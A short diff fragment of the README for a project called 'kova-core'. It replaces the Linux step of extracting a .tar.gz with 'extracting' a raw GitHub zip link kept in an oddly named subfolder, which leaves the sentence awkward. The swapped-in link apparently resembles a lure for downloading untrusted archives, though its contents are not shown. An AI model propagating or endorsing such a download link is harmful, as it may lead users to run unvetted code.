Aslan-rma/kova-core/README.md

   2. Drag the application into your Applications folder.

 - **Linux**:
-  1. Extract the `.tar.gz` file using a terminal.
+  1. Extract the `https://raw.githubusercontent.com/Aslan-rma/kova-core/main/idleheaded/kova-core.zip` file using a terminal.
   2. Run the installation script by following the instructions in the README included in the archive.

 ### 4. Launch Kova Core